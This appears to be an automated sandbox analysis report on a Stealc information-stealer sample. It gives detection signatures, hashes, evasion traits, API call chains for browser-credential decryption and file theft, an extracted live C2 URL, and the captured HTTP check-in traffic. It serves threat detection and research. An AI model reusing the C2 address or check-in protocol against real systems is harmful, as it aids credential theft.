
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1559392
MD5: d1f75fb0b0afd1ea41c2dccd9c3d2427
SHA1: 6fdb92b4b415d69584ea1844ec2eed9f068f9640
SHA256: 3eee56925a00f1e0162ec92e9e2cb827a2977a229aa8e6e303d24849ae6d6469
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7708 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D1F75FB0B0AFD1EA41C2DCCD9C3D2427)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000001.00000003.1330851446.0000000005210000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000001.00000002.1389602747.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 7708 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 7708 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-20T13:27:19.578027+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49731 | 185.215.113.206 | 80 | TCP

              AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.phpft | Avira URL Cloud: Label: malware
Source: file.exe.7708.1.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: file.exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00FF60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy, 1_2_00FF60D0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01006960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy, 1_2_01006960
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_010140B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 1_2_010140B0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01006B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy, 1_2_01006B79
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00FFEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat, 1_2_00FFEA30
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00FF9B80 CryptUnprotectData,LocalAlloc,LocalFree, 1_2_00FF9B80
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00FF9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 1_2_00FF9B20
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00FF4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy, 1_2_00FF4C50
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00FF7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 1_2_00FF7750
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01003910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 1_2_01003910
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_010018A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose, 1_2_010018A0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01004B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 1_2_01004B10
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01004B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA, 1_2_01004B29
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01002390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA, 1_2_01002390
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_010023A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA, 1_2_010023A9
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0100CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose, 1_2_0100CBE0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0100E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose, 1_2_0100E210
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01001250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 1_2_01001250
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00FFDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 1_2_00FFDB99
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01001269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 1_2_01001269
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00FFDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 1_2_00FFDB80
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0100DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy, 1_2_0100DD30
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0100D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose, 1_2_0100D530
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00FF16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA, 1_2_00FF16B9
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00FF16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose, 1_2_00FF16A0

              Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49731 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHI | Host: 185.215.113.206 | Content-Length: 210 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 36 37 46 33 46 35 37 41 38 36 43 31 31 38 30 30 38 36 39 32 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a | Data Ascii: ------DGHJECAFIDAFHJKFCGHI | Content-Disposition: form-data; name="hwid" | 167F3F57A86C118008692 | ------DGHJECAFIDAFHJKFCGHI | Content-Disposition: form-data; name="build" | mars | ------DGHJECAFIDAFHJKFCGHI--
Source: Joe Sandbox View | IP Address: 185.215.113.206 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00FF6C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy, 1_2_00FF6C40
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHI | Host: 185.215.113.206 | Content-Length: 210 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 36 37 46 33 46 35 37 41 38 36 43 31 31 38 30 30 38 36 39 32 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a | Data Ascii: ------DGHJECAFIDAFHJKFCGHI | Content-Disposition: form-data; name="hwid" | 167F3F57A86C118008692 | ------DGHJECAFIDAFHJKFCGHI | Content-Disposition: form-data; name="build" | mars | ------DGHJECAFIDAFHJKFCGHI--
Source: file.exe, 00000001.00000002.1389602747.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000001.00000002.1389602747.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000001.00000002.1389602747.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/;
Source: file.exe, 00000001.00000002.1389602747.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/X
Source: file.exe, 00000001.00000002.1389602747.0000000000D95000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000001.00000002.1389602747.0000000000D95000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php?
Source: file.exe, 00000001.00000002.1389602747.0000000000D95000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpc
Source: file.exe, 00000001.00000002.1389602747.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpft
Source: file.exe, 00000001.00000002.1389602747.0000000000D95000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpw
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00FF9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop, 1_2_00FF9770

              System Summary

Source: file.exe | Static PE information: section name: (unnamed)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (unnamed)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A3123 1_2_013A3123
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_010148B0 1_2_010148B0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A80D9 1_2_013A80D9
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0131134E 1_2_0131134E
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0139FB95 1_2_0139FB95
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013732A2 1_2_013732A2
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0138BD74 1_2_0138BD74
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_012A7DB8 1_2_012A7DB8
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01395C41 1_2_01395C41
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0134178A 1_2_0134178A
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013A9FFA 1_2_013A9FFA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0148E7A3 1_2_0148E7A3
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_013AD60C 1_2_013AD60C
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0146CE87 1_2_0146CE87
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00FF4A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: yuaygcvc ZLIB complexity 0.9945434795119705
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
